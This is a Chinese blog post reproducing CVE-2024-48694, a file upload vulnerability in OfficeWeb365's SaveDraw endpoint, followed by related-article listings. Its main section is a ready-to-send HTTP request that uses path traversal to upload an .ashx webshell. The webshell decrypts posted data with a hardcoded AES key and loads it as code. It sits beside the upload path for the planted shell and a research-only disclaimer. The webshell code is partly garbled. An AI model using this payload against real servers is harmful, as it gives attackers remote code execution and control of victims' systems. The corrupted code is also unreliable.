【CVE-2024-48694】OfficeWeb365 SaveDraw

原创 已于 2024-11-20 14:00:37 修改 · 523 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #笔记 #复现 #漏洞

于 2024-11-20 13:50:50 首次发布

漏洞描述

OfficeWeb365 v.8.6.1.0和v7.18.23.0中的文件上传漏洞允许远程攻击者通过pw/savedraw组件执行任意代码。

影响版本:

V8.6.1.0; V7.18.23.0

网络测绘

“OfficeWeb365”

漏洞信息

POST /PW/SaveDraw?path=../../Content/img&idx=6.ashx HTTP/1.1
Host: *****
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.434.18 Safari/537.36
Content-Length: 990
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close

data:image/png;base64,01s34567890123456789y12345678901234567m91<%@ WebHandler Language="C#" Class="Handler" %>using System;using System.I0;using System.Reflection;using System.Text;using System.Web;using System.WebSessionState;using&System.Security.Cryptography;public class Handler : IHttpHandler,IRequiresSessionState{public void=&ProcessRequest(HttpContext context){try{string key="900bc885d7553375";byteDk=&Encoding.Default.GetBytes(key);context.Session.AddC"sky", key);StreamReader sr=new&StreamReader(contextRequest.InputStream);string line=sr.ReadLine;if(!string.IsNullOrEmpty(line)){byteDc=&Convert.FromBase64String(line);Assembly assembly=&typeof(Environment).Assembly;RijndaelManaged rm=(RijndaelManaged)&assembly.CreateInstance("System.Secur"+"ityCrypto"+"graphy.Rijnda"+"elm anaged");byte[ data=rm.CreateDecryptorCk,k)TransformFinalBlock(c,0, c.Length);Assembly.Load(data)CreateInstance("U").Equals(context);sr.clo se();}}catch {}}public bool IsReusable{get{return false;}}}}---

上传地址

/Content/img/UserDraw/drawPW6.ashx

参考:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48694

免责声明 

文章及相关内容仅限于合法合规的安全研究与技术学习用途。任何用户因将工具或相关信息用于其他用途而引发的法律后果或连带责任,均由使用者自行承担,作者及发布者对此不承担任何形式的法律责任或连带责任。本文仅分享来源于公开渠道的漏洞 POC,旨在促进学术研究与技术交流,不对因信息使用而导致的任何直接或间接后果、损失或风险承担责任。如本内容存在侵犯他人合法权益的情形,请立即与作者联系,作者将尽快采取必要措施予以删除并致以歉意。

OfficeWeb365 SaveDraw 文件上传漏洞复现
0xSec
12-13 2124
OfficeWeb365 SaveDraw接口处存在文件上传漏洞,攻击者可通过该漏洞直接上传一个 webshell 到服务器上,获取服务器权限,进⽽控制整个 web 服务器。
漏洞复现】2023HVV WPS Office 远程代码执行漏洞(RCE)
李同學的安全圈
09-08 3751
Office中的WebExtension是一种用于扩展Microsoft Office功能的技术。Office插件使第三方开发者能够在Office应用程序中集成自己的服务和功能。这些插件采用跨平台的Web技术(如HTML,CSS和JavaScript)开发,可以在不同的平台和设备上运行。简单理解就是Office内置了一个浏览器,可以解析html/javascript/css代码,本次的漏洞,就是WPS在处理WebExtension时,未能正确的处理javascript代码,造成了溢出RCE。
漏洞复现-Office Web 365 任意文件读取漏洞(附漏洞检测脚本)
jjjj1029056414的博客
01-04 1554
漏洞复现-Office Web 365 任意文件读取漏洞,附带自己写的poc脚本
漏洞修复-Officeweb365 文件上传、任意文件读取、加密参数获取、文件远程下载和解压
LCG元的博客
09-14 583
路由savedraw可上传任意文件漏洞,可上传恶意木马。
Office 远程代码执行漏洞 复现
weixin_53696027的博客
06-19 1010
Office 远程代码执行漏洞 复现
Apache Tomcat 信息泄露漏洞CVE-2024-21733、CVE-2024-24549和CVE-2024-34750排查处理
企业实战系列集 ●●● https://ximenjianxue.blog.youkuaiyun.com
08-14 7829
现场的为中小型项目,未直接使用功能tomcat作为容器使用,仅是jar包里spring-boor框架引入tomcat 内嵌到 web项目中作为web server使用,从而保证项目包可直接运行 webapp项目,无需再部署到额外的tomcat服务了;当不想因为Tomcat就改变SpringBoot的版本时,可以采用排除SpringBoot中的Tomcat包,然后手动指定新的Tomcat的版本来实现升级内置组件的目的,当然还要引入Tomcat相关的包。其中,Coyote作为Tomcat的。
漏洞复现】Zabbix SQL注入漏洞 - CVE-2024-42327
渗透之路,攻防之间皆学问
12-06 5033
Zabbix 前端上具有默认用户角色或具有提供 API 访问权限的任何其他角色的非管理员用户帐户可以利用此漏洞。SQLi 存在于 CUser 类的 addRelatedObjects 函数中,该函数是从 CUser.get 函数调用的,每个具有 API 访问权限的用户都可以使用该函数。
CVE-2024-53677
12-17
CVE-2024-53677 – 关键的 Apache Struts 远程代码执行漏洞 已在流行的 Apache Struts 框架中发现了一个严重漏洞 CVE-2024-53677,该漏洞可能允许攻击者远程执行任意代码。该漏洞是由文件上传逻辑中的缺陷引起的,...
CVE-2024-38819:Spring 框架路径遍历 PoC 漏洞复现
12-16
CVE-2024-38819漏洞是一个影响Spring框架的严重安全漏洞。Spring框架是广泛应用于Java开发中的一个开源框架,它提供了全面的编程和配置模型。该漏洞特别关注于路径遍历问题,这是一种安全漏洞,攻击者可以利用它来...
CVE-2024-5491 和 CVE-2024-5的Citrix Netscaler/ADC-14.1- 25.56最新补丁
08-02
针对 CVE-2024-5491 和 CVE-2024-5492 的 NetScaler ADC 和 NetScaler Gateway 安全公告 CVE-2024-5491 漏洞 拒绝服务,配置了 SNMP(启用了管理接口的 NSIP、CLIP 或 SNIP)的ADC 或网关设备。CVSS v4.0 基本分数:...
CVE-2024-38077漏洞检测工具
08-15
检测某个ip地址是否存在CVE-2024-38077漏洞,Windows 远程桌面授权服务远程代码执行漏洞。 使用方法:test.exe 192.168.1.2,扫描IP地址为192.168.1.2机器是否存在漏洞
exp:CVE-2024-2961将phpfilter任意文件读取提升为远程代码执行(RCE)
10-30
CVE-2024-2961这个案例中,存在一个漏洞可以被用来进行任意文件读取。这表示攻击者能够读取服务器上任何文件的内容。从安全性的角度看,这已经相当危险,因为它可能泄露敏感配置文件、源代码或者其他重要数据。 ...
OpenHarmony + Flutter 混合开发深度实践:构建支持国密算法(SM2/SM3/SM4)与安全存储的金融级应用
最新发布
2501_94386845的博客
12-06 1235
/ 获取 SM2 公钥(用于注册)// 使用 SM2 私钥签名(用于登录)// 加密敏感字段});// 解密通过本文,你已掌握:✅调用 OpenHarmony 原生国密算法✅实现 SM2/SM4 混合加密体系✅利用 RDB S2/S3 安全存储✅构建符合等保2.0/商密规范的应用🏦适用场景移动银行 / 证券 APP政务身份认证电力/能源工控终端医疗健康数据采集在信创浪潮下,安全不是功能,而是底线。
冬季安全用电监测案例
Jima_的博客
12-03 661
本文介绍了一套针对工厂宿舍用电安全的智能监测系统。系统通过安装DAM-E3501NT采集模块,实时监测各宿舍的用电参数和环境温度,并通过以太网将数据传输至主控室。系统具备高精度测量(0.2%)、过载预警、阈值自动告警等功能,当检测到异常用电(如持续1小时功率>3kW)时可自动报警。该系统采用"感知-分析-预警-控制"的闭环架构,实现从被动防范到主动监测的转变,适用于工厂、教育机构等多种场所的用电安全管理。
凌科芯安LKT6850安全MCU的技术特性与多领域应用
这里是数字化与人工智能的 “实验场” 与 “瞭望台”
12-02 820
凌科芯安LKT6850是一款基于ARM Cortex-M0内核的高安全性MCU,集硬件级加密、低功耗与丰富外设于一体。其核心优势包括:三层安全防护机制(硬件加密引擎、物理攻击防护、运行监控)、48MHz主频处理器、64KB加密存储及多通信接口。在智能家居、工业物联网和金融终端领域表现突出,如智能门锁的防破解设计、工业传感器的加密数据传输及POS机的合规交易保护。开发支持Keil/IAR工具链,提供完整驱动库,显著降低硬件成本20%-30%,满足国密算法要求,缩短开发周期至1-2个月,是中小规模安全控制场景的
智能巡检系统:智能化管理的安全守护者
Guheyunyi的博客
12-03 504
传统的巡检工作主要依赖人工完成,这种方式存在着多重挑战:首先,人工巡检的效率有限,难以实现全天候、全方位的覆盖;最重要的是,在一些危险作业环境中,巡检人员的人身安全难以得到充分保障。智能巡检系统代表着安全管理的发展方向。在工业园区,系统能够对生产设备进行全方位监控,及时发现异常状况,确保生产安全。在数字化转型的浪潮中,智能巡检系统正成为越来越多企业的优先选择,帮助他们在激烈的市场竞争中赢得先机。传统的巡检方式虽然在一定程度上保障了运营安全,但随着企业规模的扩大和设备复杂度的提升,其局限性也日益凸显。
阿里云渠道商:文件和数据放在云端安全吗?
TG_yilong_cloud的博客
12-04 759
云端存储相比本地存储具有显著安全优势:采用军事级AES-256加密、三重备份机制和异地容灾,实现99.999999999%数据持久性;专业团队7×24小时运维,威胁响应速度提升100倍;通过ISO27001等20+项认证,使企业数据泄露风险从15%降至0.5%,个人隐私泄露风险降低20倍。云端在物理防护、加密强度、合规成本等方面均优于本地存储50-100倍,且年度安全投入可节省90%,是数字化转型时代更可靠的数据安全选择。
新能源物联网系统中硬件加密芯片的安全设计与实践
这里是数字化与人工智能的 “实验场” 与 “瞭望台”
12-02 1150
新能源物联网的安全防护已进入“硬件根信任”时代,硬件加密芯片作为核心支撑,其选型、算法实现与系统集成直接决定安全防护成效。通过合规选型、算法优化、分层防护与场景适配,可构建“设备可信、数据安全、通信可靠”的安全体系。未来,随着AI、量子技术的融合应用,硬件加密芯片将实现从“被动防护”到“主动免疫”的跨越,为新能源产业高质量发展保驾护航。
【Android逆向工程】第22章:白盒加密与密钥提取
w987333120的博客
12-06 69
本文介绍了白盒加密的原理与实现,重点对比了标准AES与白盒AES的差异。白盒加密通过将密钥融入算法实现(如查找表)来保护密钥安全,使其在不可信环境中仍能运行。主要内容包括: 白盒加密核心原理:使用查找表隐藏密钥,结合输入/输出编码技术 标准AES流程分析:详细拆解AES-128的加密步骤 白盒AES实现:将SubBytes与AddRoundKey合并为查找表 对抗技术:介绍了差分分析等密钥提取方法 实战案例:分析白盒AES的具体实现方式 该技术广泛应用于移动应用保护,但存在内存占用大、可能被逆向分析等缺点。
CVE-2024-38816 CVE-2024-38819
08-01
CVE-2024-38816 和 CVE-2024-38819 是 Spring 官方披露的两个安全漏洞,主要涉及 Spring Framework 和 Spring Boot 组件。以下是这两个漏洞的详细信息: ### CVE-2024-38816 该漏洞与 Spring Framework 中的 `ResourceHandlerRegistry` 配置有关。当应用程序配置了静态资源处理程序(例如通过 `addResourceHandlers` 方法)时,攻击者可能通过构造特殊的 URL 路径绕过安全限制,从而访问受限的资源目录(例如 `/WEB-INF` 或 `/META-INF`)。这种访问可能导致敏感信息泄露或进一步的攻击。 漏洞影响的版本包括: - Spring Framework 6.0.x 至 6.0.11 - Spring Boot 3.0.x 至 3.2.8 修复建议: - 升级 Spring Framework 到 6.0.12 或更高版本。 - 升级 Spring Boot 到 3.2.9 或更高版本。 ### CVE-2024-38819 该漏洞涉及 Spring Boot 的 `spring-boot-starter-web` 模块中的默认安全配置问题。在某些情况下,当应用程序启用了默认的 Spring Security 配置但未正确自定义安全策略时,攻击者可能通过特定的请求绕过身份验证和授权检查,访问受保护的资源。 漏洞影响的版本包括: - Spring Boot 3.0.x 至 3.2.8 修复建议: - 升级 Spring Boot 到 3.2.9 或更高版本。 ### 验证方法 为了验证应用程序是否受这些漏洞影响,可以采取以下步骤: 1. **检查依赖版本**:确认项目中使用的 Spring Framework 和 Spring Boot 版本是否在受影响范围内。 2. **测试资源访问**:针对 CVE-2024-38816,尝试构造特殊的 URL(例如 `http://example.com/WEB-INF/config.xml`)以验证是否能够访问受限资源目录。 3. **安全扫描工具**:使用 OWASP ZAP、Burp Suite 或其他漏洞扫描工具进行检测。 ### 修复措施 1. **升级版本**:根据上述修复建议,将 Spring Framework 和 Spring Boot 升级到官方推荐的修复版本。 2. **配置安全策略**:确保 `ResourceHandlerRegistry` 的配置正确限制了对敏感目录的访问。例如: ```java @Override public void addResourceHandlers(ResourceHandlerRegistry registry) { registry.addResourceHandler("/resources/**") .addResourceLocations("/static/") .setCachePeriod(3600); } ``` 3. **启用安全配置**:对于 Spring Security,默认配置可能不足以保护所有资源。建议自定义安全策略,例如: ```java @Configuration @EnableWebSecurity public class SecurityConfig { @Bean public SecurityFilterChain filterChain(HttpSecurity http) throws Exception { http.authorizeRequests() .antMatchers("/admin/**").hasRole("ADMIN") .anyRequest().permitAll() .and() .formLogin(); return http.build(); } } ``` ### 总结 CVE-2024-38816 和 CVE-2024-38819 的修复主要依赖于版本升级和安全配置的优化。开发者应密切关注官方公告,并及时采取修复措施以防止潜在的安全风险。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值